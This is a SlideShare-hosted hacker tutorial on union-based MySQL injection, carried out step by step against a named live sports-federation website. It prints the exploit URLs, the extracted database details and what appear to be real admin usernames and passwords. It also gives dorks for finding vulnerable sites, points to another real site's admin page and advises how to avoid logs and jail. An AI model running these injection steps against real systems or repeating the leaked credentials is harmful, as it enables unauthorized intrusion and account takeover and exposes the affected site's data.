Sql full tutorial


Published on

Published in: Education, Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Sql full tutorial

  1. 1. MySQL Injection[FULL TUTORIAL] Structure: 1.Intro# 2.What is SQL 3.MySQL 4.How to find vulnerability 5.Exploiting Mysql vulnerability 6.Getting Mysql Version 7.Getting Mysql User 8.Getting Mysql Databases 9.Getting Mysql Tables 10.Getting Mysql Columns 11.Getting Information From Columns 12.Finding Admin Panel 13.Tools 14.Greetz 15.End# 1. Intro#Hello my name is AlphaSky today am going to explain MySQL Injection on Live Example.What that means?-Well it means that i'll exploit an real site.This tutorial is for anykind level reader,student,newbie even noob.I just wonna to show you how easy is this prefor of Attack.So enough talking we have a lot of things to cover here. 2. What is SQL? SQL injection is probably the most abundant programming flaw that exists on the internet at present. It is the vulnerability through which unauthorized person can access the various critical and private dat. SQL injection is not a flaw in the web or db server but but is a result of the poor and inexperienced programming practices. And it is one of the deadliest as well as easiest attack to execute from remote location.In SQL injection, we interact with DB server with the various commands
  2. 2. and get various data from it. In this tutorial, I would be discussing 3 aspects of SQL injection namely bypassing logins, accessing the secret data and modifying the page contents. 3. MySQL MySQL is a relational database management system (RDBMS) that runs as a server providing multi-user access to a number of databases. It is named after developer Michael Widenius daughter, My. The SQL phrase stands for Structured Query Language.=So the basic what you need to know about SQL and MySQL are done now the real part begins 4. How to find vulnerability There many many ways to find vulnerability.Most familiar ways are using the Google Dorks:inurl:index.php?id=inurl:article.php?id=allinurl:news.php?id=inurl:shop.ph p?cat=Hackers always say "Google is my Best Friend" now you know way without of google we couldn't do our job so easy.So at the end of this tutorial i'll post a dork list so am going to save you from searching the internet. 5. Exploiting Mysql vulnerability So lets start with exploiting our target.For this tutorial i decided to chose European Table Tennis Union Code: http://www.ettu.org I have used a dork inurl:news_view.php?id= and i got this link of the site Code: http://www.ettu.org/news_view.php?id=2583 So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or % at the and or before the id.Now our vuln. link should look like this Code: http://www.ettu.org/news_view.php?id=2583' Did you notice something was changed?-Yes the content that was previos on the site was not showed.So this is a sing that this site may be vuln. on MySQL Injection sometimes will print you a message that says Code: Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql error,mysql_query,mysql_fetch,mysql_connect In this case doesn't show so we also may be facing with MySQL NoError Injection.How can we know for sure is it vuln.?-We are going to start typeingORDER BY 1 After the ID number Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1
  3. 3. So our content is shown agaen.And now we are sure we're facing a site that is vuln. on MySQLInjection.We continue to incrise the Order Number so we find out how many columns are there until we get an blan page agaen. Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16 <== No blank Page Code: http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page wOOt!! We now know that there are 16 vuln. columns!!Now we are going to select them all with this comand UNION SELECT or UNION ALL SELECT Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16-- Dont forget to put "--" at the end or it will return an blank page.So the content loads agaen and lets see witch of these vuln. columns we can use.To do that we add a '-' before the ID Number Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- So this is very important if you dont do this you cannot continue to do the next several steps and now it prints us a vuln. columns number 2 and number 4.So this means that columns with number 2 and 4 are vulnruble and we can use them.To get Mysql version,User,Databases. 6. Getting Mysql Version To get MySQL version we use version() or @@version commands to dispaly version of MySQL Database.So we change 2 into @@version and Code:
  4. 4. http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16-- there is it MySQL Version displayed at the page. Code: 5.1.37-1ubuntu5.5 So when MySQL Version is 5> we can use information_schema to get data faster but if version is >5 that means that we need to guess the tables and columns.So we need to be very lucky to guess the tabale and column. 7. Getting Mysql User Getting the user is with the user() command Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- Displayed Code: ettu_admin@localhost 8. Getting Mysql Databases So now we need to get the databases with the followed command database() Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- Displayed Code: ettu.org_ettu_db01 Sometimes there are more databases so it good to know how many databases there are and why are they for. Because maybe the data we are looking is in the other database. 9. Getting Mysql Tables And here we are at the main think.How to find out the table names.We are going to do this with adding this command Code: group_concat(table_name) at the place of the vun. column and in our case is 2 and with adding at the end of the number of columns the following command Code:
  5. 5. FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() What does this mean?-This means to select Table Names from information_schema where table schema is from the Database. and when we replace everything we get this link and this tables: Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+ ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-F We got a lots of tables but we dont need them all so am going to press Ctrl+F [Find specific word] and type user,users,admin,members and it turns out that there is a table with the name Code: 0910ettucup01_admin Now we know that there is table with name admin and there must be some username and passwords but to that we need to find the columns in that table! 10.Getting Mysql Columns We found out that theres a table admin and now we need to find the columns we need to change table_name to column_name and Code: FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-to INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()-FROM + Now when we change all that we get Code: http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+ ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()-F with executing this we get a lot i mean really a lot of columns name that we don't need and it may take a while till we find our most needed columns so we are going to pull out only the columns from our table that we found earlier and that is from ettu.org_ettu_db01 to do this we need to you MySQL Char How to find it?-Well you can always use Google or you can install on your Mozilla an addon with name HackBar there is a MySQL char converter so now am going to convert our table into a MySQL Char Code:
  6. 6. CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105, 110) Now where to put this?-We are going to change our link into: Code: http://www.ettu.org/news_view.php?id=2583+union+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+ from+information_schema.columns+where+table_name=CHAR%2848,%2057,%2049,%2048,%20101,%2 0116,%20116, %20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097,%20100,%20109,%20105,%20110%29-- Now are displayed the columns that are in Table 'ADMIN' Code: id,login,password,stato,id_squ,girone,abilitato Our work is almost done.Just to dump usernames and passwords. 11.Getting Information From Columns To do this we are going to use a command that we are using it all the way till here.And that is group_concat().All we now need to do is to change column_name into our ectual column names and that are "login,password,id,stato ect" So lets see how ill it looks Code: http://www.ettu.org/news_view.php?id=2583+union+select+1,group_concat(id,0x3a,login,0x3a,password),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16+ rom+0910ettucup01_admin-f Damn the user-names and passwords are displayed at the site.So let explain here what we have done.We have changed information_schema.columns into the table name 'cuz we dont need not to read the columns 'cuz we already put them into the group_concat() you see id login password those are columns now from where to be selected from the table name 0910ettucup01_admin and now we have our log in details: Code: 1:adminvitesse:vitesse2006 :admin:matchvitesse 2 All it left now is to find the Admin Panel.... 12.Finding Admin Panel
  7. 7. Unfortunately our live example site doesn't have an admin panel so for this to show you i'll took another site.So when you got the admin details we need to login somewhere that somewhere is called Admin Panel or Control Panel or WebPanel its same or you can say it Login Page.To find an log in page you can use many tools ill tell you some in the next part.An example of an login page Code: http://www.discountexpress.co.uk/admin/ There you can enter the login info and get into the site and change alot 13.Tools So tools,there aren't so much tools to use when your doing this but there are a few that will help you a lot. 13.1.Admin Finder Admin finder is a tool that helps you to find the admin page or Log In Page very quick for this you can use many online or you can use some web scanner to find it.Here are 1 Good program and one good Online Scanner Online Admin Page ScannerAnd for download Acunetix Web Vulnerability Scanner=>This scanner could be used for more things but now we are not going to talk about them 13.2 Hacking Tools that are making you're work easier Well we all know that some of you have started with tools ex.Havij or MySQL Helper.Yes they are good in hand expecialy when we are hacking into a MySQL Server >5 that are guessing the table and column names so that is realy good also Havij is a great program that have Admin Finder too and MD5 Section where you can easly search about 10-12 MD5 Decripting sites so yes its realy good program but dont use it for hacking all the way into the server 'cuz it leaves a lotz of logs and you my be finish in jail 14.Greetz Greetz To All Friends,All Hackers in the world,EveryPPL who are trying to learn this! 15.End# So this is the end of my tutorial.Feel free to comment,share it where ever you wont and dont for get to Credit My Name.Am planing to continue to write tutorials not for MySQL for a lot other things but we'll see how will the time effect us -----MOZAAI MADHU HACKER